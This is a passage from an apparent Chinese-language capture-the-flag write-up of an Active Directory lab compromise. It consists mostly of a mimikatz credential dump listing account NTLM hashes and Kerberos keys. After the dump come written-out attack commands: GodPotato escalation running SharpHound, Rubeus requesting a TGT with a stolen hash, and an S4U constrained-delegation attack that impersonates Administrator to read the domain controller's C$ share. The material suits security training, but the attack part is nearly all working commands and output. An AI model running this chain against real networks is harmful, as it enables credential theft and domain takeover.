	 [00000003] Primary
	 * Username : MSSQLSERVER19
	 * Domain   : MSSQLSERVER
	 * NTLM     : 9ce3bb5769303e1258f792792310e33b
	 * SHA1     : 1a2452c461d89c45f199454f59771f17423e72f9
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER19
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	kerberos :	
	 * Username : MSSQLSERVER19
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 228927 (00000000:00037e3f)
Session           : Interactive from 0
User Name         : MSSQLSERVER18
Domain            : MSSQLSERVER
Logon Server      : MSSQLSERVER
Logon Time        : 2026/2/20 16:10:31
SID               : S-1-5-21-1403470932-1755135066-2609122076-1021
	msv :	
	 [00000003] Primary
	 * Username : MSSQLSERVER18
	 * Domain   : MSSQLSERVER
	 * NTLM     : 31de1b5e8995c7f91070f4a409599c50
	 * SHA1     : 070c0d12760e50812236b5717c75222a206aace8
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER18
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	kerberos :	
	 * Username : MSSQLSERVER18
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 228762 (00000000:00037d9a)
Session           : Interactive from 0
User Name         : MSSQLSERVER16
Domain            : MSSQLSERVER
Logon Server      : MSSQLSERVER
Logon Time        : 2026/2/20 16:10:31
SID               : S-1-5-21-1403470932-1755135066-2609122076-1019
	msv :	
	 [00000003] Primary
	 * Username : MSSQLSERVER16
	 * Domain   : MSSQLSERVER
	 * NTLM     : 42c0eed1872923f6b60118d9711282a6
	 * SHA1     : dcf14b63c01e9d5a9d4d9c25d1b2eb6c65c2e3a6
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER16
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	kerberos :	
	 * Username : MSSQLSERVER16
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 228437 (00000000:00037c55)
Session           : Interactive from 0
User Name         : MSSQLSERVER12
Domain            : MSSQLSERVER
Logon Server      : MSSQLSERVER
Logon Time        : 2026/2/20 16:10:31
SID               : S-1-5-21-1403470932-1755135066-2609122076-1015
	msv :	
	 [00000003] Primary
	 * Username : MSSQLSERVER12
	 * Domain   : MSSQLSERVER
	 * NTLM     : 672702a4bd7524269b77dbb6b2e75911
	 * SHA1     : c7a828609e4912ab752b43deda8351dc1a8ea240
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER12
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	kerberos :	
	 * Username : MSSQLSERVER12
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 228192 (00000000:00037b60)
Session           : Interactive from 0
User Name         : MSSQLSERVER09
Domain            : MSSQLSERVER
Logon Server      : MSSQLSERVER
Logon Time        : 2026/2/20 16:10:31
SID               : S-1-5-21-1403470932-1755135066-2609122076-1012
	msv :	
	 [00000003] Primary
	 * Username : MSSQLSERVER09
	 * Domain   : MSSQLSERVER
	 * NTLM     : 2dd7fe93426175a9ff3fa928bcf0eb77
	 * SHA1     : a34c0482568fc9329f33ccdc1852fab9ef65bcd1
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER09
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	kerberos :	
	 * Username : MSSQLSERVER09
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 227867 (00000000:00037a1b)
Session           : Interactive from 0
User Name         : MSSQLSERVER05
Domain            : MSSQLSERVER
Logon Server      : MSSQLSERVER
Logon Time        : 2026/2/20 16:10:31
SID               : S-1-5-21-1403470932-1755135066-2609122076-1008
	msv :	
	 [00000003] Primary
	 * Username : MSSQLSERVER05
	 * Domain   : MSSQLSERVER
	 * NTLM     : b552da4a7f732c40ca73c01dfaea7ebc
	 * SHA1     : 7f041a31e763eed45fb881c7f77831b888c3051d
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER05
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	kerberos :	
	 * Username : MSSQLSERVER05
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 227786 (00000000:000379ca)
Session           : Interactive from 0
User Name         : MSSQLSERVER04
Domain            : MSSQLSERVER
Logon Server      : MSSQLSERVER
Logon Time        : 2026/2/20 16:10:31
SID               : S-1-5-21-1403470932-1755135066-2609122076-1007
	msv :	
	 [00000003] Primary
	 * Username : MSSQLSERVER04
	 * Domain   : MSSQLSERVER
	 * NTLM     : 36bd3cceea3d413e8111b0bef32da84d
	 * SHA1     : 414d2c783a3fb2ba855e41c243c583bb0604fe02
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER04
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	kerberos :	
	 * Username : MSSQLSERVER04
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 227624 (00000000:00037928)
Session           : Interactive from 0
User Name         : MSSQLSERVER02
Domain            : MSSQLSERVER
Logon Server      : MSSQLSERVER
Logon Time        : 2026/2/20 16:10:31
SID               : S-1-5-21-1403470932-1755135066-2609122076-1005
	msv :	
	 [00000003] Primary
	 * Username : MSSQLSERVER02
	 * Domain   : MSSQLSERVER
	 * NTLM     : 3aa518732551a136003ea41f9599a1ec
	 * SHA1     : 6f1ed1f677201d998667bd8e3b81cfb52b9a138a
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER02
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	kerberos :	
	 * Username : MSSQLSERVER02
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 185896 (00000000:0002d628)
Session           : Service from 0
User Name         : MSSQLLaunchpad
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 2026/2/20 16:10:18
SID               : S-1-5-80-3477044410-376262199-2110164357-2030828471-4165405235
	msv :	
	 [00000003] Primary
	 * Username : MSSQLSERVER$
	 * Domain   : XIAORANG
	 * NTLM     : f496fe749b403f432a5e2c0d49113a29
	 * SHA1     : 860c0b21fed6f351aee372dbae3473686e272d2a
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : MSSQLSERVER$
	 * Domain   : xiaorang.lab
	 * Password : fe 39 57 2b 53 52 71 e1 a0 13 7e 6f e1 c0 5d 89 83 df 49 06 ac 82 99 3a 4e 7e 27 b3 a0 46 34 4d d3 38 f1 31 9c ea 9b 01 5f 8d 18 2e bc b7 d8 84 52 d4 de 1d e5 cb 7a 83 79 15 33 07 35 5b 23 aa 00 f5 29 88 e6 f1 66 32 21 9f c8 17 e6 48 49 69 
3b f4 56 d9 f6 fe a5 d1 eb c3 87 88 e3 fd a7 b5 5a 5d d1 24 d1 7c 2b 26 e4 fa 3e 14 31 05 d3 96 5d e2 80 59 ea 2f 3a 2a c7 e3 82 ac 19 73 18 04 2f 73 17 03 54 7b d1 fc b9 10 c9 64 17 7f 3f 3e f6 a9 61 2c 1f cb 83 2f 53 ab f1 37 1b b1 69 f5 14 1b ff b5 3c 
80 5d 77 7d 18 72 08 11 32 5b 61 27 1b ca 9a 91 0a e7 98 fa b1 4a af e1 6a 11 2d ee 1c 2d 17 3d 49 79 81 92 42 15 6c 31 e8 2d 75 ab 7a aa 81 f8 86 af 7f 37 50 d2 66 63 87 4e 88 d6 50 de 88 ed 3e d5 10 55 f5 f4 36 3a 32 8b d1 
	ssp :	
	credman :	

Authentication Id : 0 ; 98140 (00000000:00017f5c)
Session           : Service from 0
User Name         : SQLTELEMETRY
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 2026/2/20 16:10:09
SID               : S-1-5-80-2652535364-2169709536-2857650723-2622804123-1107741775
	msv :	
	 [00000003] Primary
	 * Username : MSSQLSERVER$
	 * Domain   : XIAORANG
	 * NTLM     : f496fe749b403f432a5e2c0d49113a29
	 * SHA1     : 860c0b21fed6f351aee372dbae3473686e272d2a
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : MSSQLSERVER$
	 * Domain   : xiaorang.lab
	 * Password : fe 39 57 2b 53 52 71 e1 a0 13 7e 6f e1 c0 5d 89 83 df 49 06 ac 82 99 3a 4e 7e 27 b3 a0 46 34 4d d3 38 f1 31 9c ea 9b 01 5f 8d 18 2e bc b7 d8 84 52 d4 de 1d e5 cb 7a 83 79 15 33 07 35 5b 23 aa 00 f5 29 88 e6 f1 66 32 21 9f c8 17 e6 48 49 69 
3b f4 56 d9 f6 fe a5 d1 eb c3 87 88 e3 fd a7 b5 5a 5d d1 24 d1 7c 2b 26 e4 fa 3e 14 31 05 d3 96 5d e2 80 59 ea 2f 3a 2a c7 e3 82 ac 19 73 18 04 2f 73 17 03 54 7b d1 fc b9 10 c9 64 17 7f 3f 3e f6 a9 61 2c 1f cb 83 2f 53 ab f1 37 1b b1 69 f5 14 1b ff b5 3c 
80 5d 77 7d 18 72 08 11 32 5b 61 27 1b ca 9a 91 0a e7 98 fa b1 4a af e1 6a 11 2d ee 1c 2d 17 3d 49 79 81 92 42 15 6c 31 e8 2d 75 ab 7a aa 81 f8 86 af 7f 37 50 d2 66 63 87 4e 88 d6 50 de 88 ed 3e d5 10 55 f5 f4 36 3a 32 8b d1 
	ssp :	
	credman :	

Authentication Id : 0 ; 97825 (00000000:00017e21)
Session           : Service from 0
User Name         : SSASTELEMETRY
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 2026/2/20 16:10:09
SID               : S-1-5-80-1549978933-2891762758-2075524219-3728768389-1145206490
	msv :	
	 [00000003] Primary
	 * Username : MSSQLSERVER$
	 * Domain   : XIAORANG
	 * NTLM     : f496fe749b403f432a5e2c0d49113a29
	 * SHA1     : 860c0b21fed6f351aee372dbae3473686e272d2a
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : MSSQLSERVER$
	 * Domain   : xiaorang.lab
	 * Password : fe 39 57 2b 53 52 71 e1 a0 13 7e 6f e1 c0 5d 89 83 df 49 06 ac 82 99 3a 4e 7e 27 b3 a0 46 34 4d d3 38 f1 31 9c ea 9b 01 5f 8d 18 2e bc b7 d8 84 52 d4 de 1d e5 cb 7a 83 79 15 33 07 35 5b 23 aa 00 f5 29 88 e6 f1 66 32 21 9f c8 17 e6 48 49 69 
3b f4 56 d9 f6 fe a5 d1 eb c3 87 88 e3 fd a7 b5 5a 5d d1 24 d1 7c 2b 26 e4 fa 3e 14 31 05 d3 96 5d e2 80 59 ea 2f 3a 2a c7 e3 82 ac 19 73 18 04 2f 73 17 03 54 7b d1 fc b9 10 c9 64 17 7f 3f 3e f6 a9 61 2c 1f cb 83 2f 53 ab f1 37 1b b1 69 f5 14 1b ff b5 3c 
80 5d 77 7d 18 72 08 11 32 5b 61 27 1b ca 9a 91 0a e7 98 fa b1 4a af e1 6a 11 2d ee 1c 2d 17 3d 49 79 81 92 42 15 6c 31 e8 2d 75 ab 7a aa 81 f8 86 af 7f 37 50 d2 66 63 87 4e 88 d6 50 de 88 ed 3e d5 10 55 f5 f4 36 3a 32 8b d1 
	ssp :	
	credman :	

Authentication Id : 0 ; 97760 (00000000:00017de0)
Session           : Service from 0
User Name         : ReportServer
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 2026/2/20 16:10:09
SID               : S-1-5-80-2885764129-887777008-271615777-1616004480-2722851051
	msv :	
	 [00000003] Primary
	 * Username : MSSQLSERVER$
	 * Domain   : XIAORANG
	 * NTLM     : f496fe749b403f432a5e2c0d49113a29
	 * SHA1     : 860c0b21fed6f351aee372dbae3473686e272d2a
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : MSSQLSERVER$
	 * Domain   : xiaorang.lab
	 * Password : fe 39 57 2b 53 52 71 e1 a0 13 7e 6f e1 c0 5d 89 83 df 49 06 ac 82 99 3a 4e 7e 27 b3 a0 46 34 4d d3 38 f1 31 9c ea 9b 01 5f 8d 18 2e bc b7 d8 84 52 d4 de 1d e5 cb 7a 83 79 15 33 07 35 5b 23 aa 00 f5 29 88 e6 f1 66 32 21 9f c8 17 e6 48 49 69 
3b f4 56 d9 f6 fe a5 d1 eb c3 87 88 e3 fd a7 b5 5a 5d d1 24 d1 7c 2b 26 e4 fa 3e 14 31 05 d3 96 5d e2 80 59 ea 2f 3a 2a c7 e3 82 ac 19 73 18 04 2f 73 17 03 54 7b d1 fc b9 10 c9 64 17 7f 3f 3e f6 a9 61 2c 1f cb 83 2f 53 ab f1 37 1b b1 69 f5 14 1b ff b5 3c 
80 5d 77 7d 18 72 08 11 32 5b 61 27 1b ca 9a 91 0a e7 98 fa b1 4a af e1 6a 11 2d ee 1c 2d 17 3d 49 79 81 92 42 15 6c 31 e8 2d 75 ab 7a aa 81 f8 86 af 7f 37 50 d2 66 63 87 4e 88 d6 50 de 88 ed 3e d5 10 55 f5 f4 36 3a 32 8b d1 
	ssp :	
	credman :	

Authentication Id : 0 ; 92932 (00000000:00016b04)
Session           : Service from 0
User Name         : MSSQLSERVER
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 2026/2/20 16:10:09
SID               : S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003
	msv :	
	 [00000003] Primary
	 * Username : MSSQLSERVER$
	 * Domain   : XIAORANG
	 * NTLM     : f496fe749b403f432a5e2c0d49113a29
	 * SHA1     : 860c0b21fed6f351aee372dbae3473686e272d2a
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : MSSQLSERVER$
	 * Domain   : xiaorang.lab
	 * Password : fe 39 57 2b 53 52 71 e1 a0 13 7e 6f e1 c0 5d 89 83 df 49 06 ac 82 99 3a 4e 7e 27 b3 a0 46 34 4d d3 38 f1 31 9c ea 9b 01 5f 8d 18 2e bc b7 d8 84 52 d4 de 1d e5 cb 7a 83 79 15 33 07 35 5b 23 aa 00 f5 29 88 e6 f1 66 32 21 9f c8 17 e6 48 49 69 
3b f4 56 d9 f6 fe a5 d1 eb c3 87 88 e3 fd a7 b5 5a 5d d1 24 d1 7c 2b 26 e4 fa 3e 14 31 05 d3 96 5d e2 80 59 ea 2f 3a 2a c7 e3 82 ac 19 73 18 04 2f 73 17 03 54 7b d1 fc b9 10 c9 64 17 7f 3f 3e f6 a9 61 2c 1f cb 83 2f 53 ab f1 37 1b b1 69 f5 14 1b ff b5 3c 
80 5d 77 7d 18 72 08 11 32 5b 61 27 1b ca 9a 91 0a e7 98 fa b1 4a af e1 6a 11 2d ee 1c 2d 17 3d 49 79 81 92 42 15 6c 31 e8 2d 75 ab 7a aa 81 f8 86 af 7f 37 50 d2 66 63 87 4e 88 d6 50 de 88 ed 3e d5 10 55 f5 f4 36 3a 32 8b d1 
	ssp :	
	credman :	

Authentication Id : 0 ; 92930 (00000000:00016b02)
Session           : Service from 0
User Name         : MsDtsServer130
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 2026/2/20 16:10:09
SID               : S-1-5-80-3763098489-2620711134-3767674660-4164406483-1621732
	msv :	
	 [00000003] Primary
	 * Username : MSSQLSERVER$
	 * Domain   : XIAORANG
	 * NTLM     : f496fe749b403f432a5e2c0d49113a29
	 * SHA1     : 860c0b21fed6f351aee372dbae3473686e272d2a
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : MSSQLSERVER$
	 * Domain   : xiaorang.lab
	 * Password : fe 39 57 2b 53 52 71 e1 a0 13 7e 6f e1 c0 5d 89 83 df 49 06 ac 82 99 3a 4e 7e 27 b3 a0 46 34 4d d3 38 f1 31 9c ea 9b 01 5f 8d 18 2e bc b7 d8 84 52 d4 de 1d e5 cb 7a 83 79 15 33 07 35 5b 23 aa 00 f5 29 88 e6 f1 66 32 21 9f c8 17 e6 48 49 69 
3b f4 56 d9 f6 fe a5 d1 eb c3 87 88 e3 fd a7 b5 5a 5d d1 24 d1 7c 2b 26 e4 fa 3e 14 31 05 d3 96 5d e2 80 59 ea 2f 3a 2a c7 e3 82 ac 19 73 18 04 2f 73 17 03 54 7b d1 fc b9 10 c9 64 17 7f 3f 3e f6 a9 61 2c 1f cb 83 2f 53 ab f1 37 1b b1 69 f5 14 1b ff b5 3c 
80 5d 77 7d 18 72 08 11 32 5b 61 27 1b ca 9a 91 0a e7 98 fa b1 4a af e1 6a 11 2d ee 1c 2d 17 3d 49 79 81 92 42 15 6c 31 e8 2d 75 ab 7a aa 81 f8 86 af 7f 37 50 d2 66 63 87 4e 88 d6 50 de 88 ed 3e d5 10 55 f5 f4 36 3a 32 8b d1 
	ssp :	
	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2026/2/20 16:10:08
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 64026 (00000000:0000fa1a)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2026/2/20 16:10:08
SID               : S-1-5-90-0-1
	msv :	
	 [00000003] Primary
	 * Username : MSSQLSERVER$
	 * Domain   : XIAORANG
	 * NTLM     : cea3e66a2715c71423e7d3f0ff6cd352
	 * SHA1     : 6de4e8f192569bbc44ae94f273870635ae878094
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : MSSQLSERVER$
	 * Domain   : xiaorang.lab
	 * Password : (p4Spnv`&9xTZ=D'D/lz[a:94O:$E!7&zfcMza9k;Se"&>cBCBU0bxw.xL"B>\GmtUT,<:q3Yxfq#`O3sLI;OK" (_T_T5- $zV]-i;)c$qIj&$RgttdZI"m
	ssp :	
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : MSSQLSERVER$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2026/2/20 16:09:53
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : mssqlserver$
	 * Domain   : XIAORANG.LAB
	 * Password : (null)
	ssp :	
	credman :	

mimikatz(commandline) # exit
Bye!

之后上传sharphound.exe收集域信息

C:\Users\Public\GodPotato-NET4.exe -cmd "C:\Users\Public\SharpHound.exe -c All --OutputDirectory C:\Users\Public\ --ZipFileName xiaorang_ad.zip"

MSSQLSERVER 配置了到 DC LDAP 和 CIFS 服务的约束性委派

接下来就是约束委派攻击

什么是约束委派？

在域环境中，服务经常需要代替用户去访问另一个服务。微软引入了委派机制。约束委派指的是：允许服务 A（在这里是 MSSQLSERVER$）代表某个用户，去访问特定的服务 B（在这里是 CIFS/DC.xiaorang.lab）。

用域服务账号请求一个TGT服务票据

C:\Users\Public>C:\Users\Public\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:f496fe749b403f432a5e2c0d49113a29 /domain:xiaorang.lab /dc:172.22.2.3 /nowrap

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0

[*] Action: Ask TGT

[*] Using rc4_hmac hash: f496fe749b403f432a5e2c0d49113a29
[*] Building AS-REQ (w/ preauth) for: 'xiaorang.lab\MSSQLSERVER$'
[*] Using domain controller: 172.22.2.3:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE1V2Ed9YcZpPyF11cs7qv1NAna82paa/pSMwVqPVSsr7EmPnXHbPbKsVQkA0s/3JgIDcEDXffn17g4VJ4U/PTI973R8qbv/Q9mduFYhJFRO3wFp3aJKya69bfORDJcDotkKqNMxRtfMcpl6EhVMf4C2cZytSIDkeqmvU7B0FHUEjs1tBpJNbXu7N9WLMWTYuvzO3RcBsuRogRp4lQ+3YWZz4YRYm5HtU9pbaetKgW8+m9D/L9IuhE0wlqTHF7vP1GZYi97GQu9PEaRV9o6QxqE5cbj27hhucqXJW1XiaXf+Khn4fLAQ7fOu2WW/R+5nbQtl0E+DwVNWO9JJYQEyDNhAsZRUf3SWoLcb6I0SYnd2qvcU2GWJpS4sqd2m7jksQo6CF40ASY3rKlkI+iWgFgqF2Li8oCBDjLnLR4VUNNuy5dyI8d1QH9XUbOIQ26VC9+D6jA4Mb/E7QvQR+yiruKemB+9M2sysABrt3iZJFLA3kQrBgaMgKg2WJ4QfEp/o5XxrqceYuPahTioWruyKWeMi0YuPpWfD1QE5koklDl2ddcoHhCMJeHTEk3/HyLDbauh298oQ4wcuMTkwIwOP1bk3Fh4+WZBUm21T/dBJy9uYQzAsKE+yC23jDSo3d1tR8OhuPUTRrOuYexV0eaqGIGlVBpQD9KOJTxhogDRxVOzQNZPDQMZ2L72mWNd+xUYtAlo4UzBZpfdtcaW+3BIaPf4KB+T0DS/tOvcbWfyRIdigIsVJ4Pf8ST+a9C2A1q/qKuMddW7s+IAGevbO8YiLZkaBvv4wJHJDjTdssA43qHiD4fxKwc32ZpsqDw4NaBZo+LlnGu2uTdvRXLJNTvCfQImAn08EGX4/vWS5FJJMjAkFIGOj2fdz//cKwZXHwMAzYZ7mIJjTExiyXz5ambCSHoLIJTgRWJcFUruMxq6iEalR4scRO2/UMjiMWIBWlBeDmz5uJsSR9KTaP4on/ZBmuJGX3/zbobHPgI75WkG8Ge2cqVN4AHq14nUsIiU1YpIq7sOJzEuSY8kX3WaHVjhOnmJWkmRnAgTGBRc46eyb9POY4p4u9fZGk/RQS5ECj4mezuyciMQ+OI8YKbyy8zabn5vmwXtU/wenlcEMQmBHoBp/I6URtcgDFpybRBEMOShg8hshGj5595pkfuoQzhQvSym3XbUa0IrXvNTI+EBIZdepsbUFbSzZ+dDdkRrXJFg+LaMjEOBe34Hi3/WGrG2MDvIBcWMP9W8ImsrhMGNP4i/r3hwuqtO0wEXTJGuOGHhFy4OKzV2aNuJCYEogz1VOkdjzXN2m9OlncCwVwU1ixMla7P6QGnpzqG8ECMnISRdjcMhODMVy7c+J81Xtik71oROZDnrrGOesENkLcsPui/jOMU95RoU+B4wHrBevZNiRDbcq6cgeSspBUN2lIpZ0cfNbY5/we5u0geR2wI0UepW4ijLPCuAz991k6KFPReejgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBDLiY2O7vIrHZr6uMB0oPxHoQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDI2MDIyMDEwMTUzMlqmERgPMjAyNjAyMjAyMDE1MzJapxEYDzIwMjYwMjI3MTAxNTMyWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg==

  ServiceName              :  krbtgt/xiaorang.lab
  ServiceRealm             :  XIAORANG.LAB
  UserName                 :  MSSQLSERVER$
  UserRealm                :  XIAORANG.LAB
  StartTime                :  2026/2/20 18:15:32
  EndTime                  :  2026/2/21 4:15:32
  RenewTill                :  2026/2/27 18:15:32
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  y4mNju7yKx2a+rjAdKD8Rw==
  ASREP (key)              :  F496FE749B403F432A5E2C0D49113A29


C:\Users\Public>

现在执行 S4U 攻击获取域管票据

C:\Users\Public\Rubeus.exe s4u /ticket:doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE1V2Ed9YcZpPyF11cs7qv1NAna82paa/pSMwVqPVSsr7EmPnXHbPbKsVQkA0s/3JgIDcEDXffn17g4VJ4U/PTI973R8qbv/Q9mduFYhJFRO3wFp3aJKya69bfORDJcDotkKqNMxRtfMcpl6EhVMf4C2cZytSIDkeqmvU7B0FHUEjs1tBpJNbXu7N9WLMWTYuvzO3RcBsuRogRp4lQ+3YWZz4YRYm5HtU9pbaetKgW8+m9D/L9IuhE0wlqTHF7vP1GZYi97GQu9PEaRV9o6QxqE5cbj27hhucqXJW1XiaXf+Khn4fLAQ7fOu2WW/R+5nbQtl0E+DwVNWO9JJYQEyDNhAsZRUf3SWoLcb6I0SYnd2qvcU2GWJpS4sqd2m7jksQo6CF40ASY3rKlkI+iWgFgqF2Li8oCBDjLnLR4VUNNuy5dyI8d1QH9XUbOIQ26VC9+D6jA4Mb/E7QvQR+yiruKemB+9M2sysABrt3iZJFLA3kQrBgaMgKg2WJ4QfEp/o5XxrqceYuPahTioWruyKWeMi0YuPpWfD1QE5koklDl2ddcoHhCMJeHTEk3/HyLDbauh298oQ4wcuMTkwIwOP1bk3Fh4+WZBUm21T/dBJy9uYQzAsKE+yC23jDSo3d1tR8OhuPUTRrOuYexV0eaqGIGlVBpQD9KOJTxhogDRxVOzQNZPDQMZ2L72mWNd+xUYtAlo4UzBZpfdtcaW+3BIaPf4KB+T0DS/tOvcbWfyRIdigIsVJ4Pf8ST+a9C2A1q/qKuMddW7s+IAGevbO8YiLZkaBvv4wJHJDjTdssA43qHiD4fxKwc32ZpsqDw4NaBZo+LlnGu2uTdvRXLJNTvCfQImAn08EGX4/vWS5FJJMjAkFIGOj2fdz//cKwZXHwMAzYZ7mIJjTExiyXz5ambCSHoLIJTgRWJcFUruMxq6iEalR4scRO2/UMjiMWIBWlBeDmz5uJsSR9KTaP4on/ZBmuJGX3/zbobHPgI75WkG8Ge2cqVN4AHq14nUsIiU1YpIq7sOJzEuSY8kX3WaHVjhOnmJWkmRnAgTGBRc46eyb9POY4p4u9fZGk/RQS5ECj4mezuyciMQ+OI8YKbyy8zabn5vmwXtU/wenlcEMQmBHoBp/I6URtcgDFpybRBEMOShg8hshGj5595pkfuoQzhQvSym3XbUa0IrXvNTI+EBIZdepsbUFbSzZ+dDdkRrXJFg+LaMjEOBe34Hi3/WGrG2MDvIBcWMP9W8ImsrhMGNP4i/r3hwuqtO0wEXTJGuOGHhFy4OKzV2aNuJCYEogz1VOkdjzXN2m9OlncCwVwU1ixMla7P6QGnpzqG8ECMnISRdjcMhODMVy7c+J81Xtik71oROZDnrrGOesENkLcsPui/jOMU95RoU+B4wHrBevZNiRDbcq6cgeSspBUN2lIpZ0cfNbY5/we5u0geR2wI0UepW4ijLPCuAz991k6KFPReejgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBDLiY2O7vIrHZr6uMB0oPxHoQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDI2MDIyMDEwMTUzMlqmERgPMjAyNjAyMjAyMDE1MzJapxEYDzIwMjYwMjI3MTAxNTMyWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg== /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /ptt"

现在票据直接注入到了内存里,我们可以远程读到域控上的flag了

C:\Users\Public>dir \\DC.xiaorang.lab\C$
 驱动器 \\DC.xiaorang.lab\C$ 中的卷没有标签。
 卷的序列号是 4659-5697

 \\DC.xiaorang.lab\C$ 的目录

2022/05/12  17:17    <DIR>          PerfLogs
2022/06/08  16:30    <DIR>          Program Files
2022/05/18  10:00    <DIR>          Program Files (x86)
2022/06/08  16:30    <DIR>          Users
2026/02/20  16:10    <DIR>          Windows
2022/06/09  08:09                21 __output
               1 个文件             21 字节
               5 个目录 29,019,992,064 可用字节

C:\Users\Public>type \\DC.xiaorang.lab\C$\Users\Administrator\flag\flag04.txt
 ######:                                               ###   ######:                             ##
 #######                         ##                   :###   #######                             ##
 ##   :##                        ##                  .####   ##   :##                            ##
 ##    ##   ##.####  ##    ##  #######    .####:     ##.##   ##    ##   .####.    :####     :###.##
 ##   :##   #######  ##    ##  #######   .######:   :#: ##   ##   :##  .######.   ######   :#######
 #######.   ###.     ##    ##    ##      ##:  :##  .##  ##   #######:  ###  ###   #:  :##  ###  ###
 #######.   ##       ##    ##    ##      ########  ##   ##   ######    ##.  .##    :#####  ##.  .##
 ##   :##   ##       ##    ##    ##      ########  ########  ##   ##.  ##    ##  .#######  ##    ##
 ##    ##   ##       ##    ##    ##      ##        ########  ##   ##   ##.  .##  ## .  ##  ##.  .##
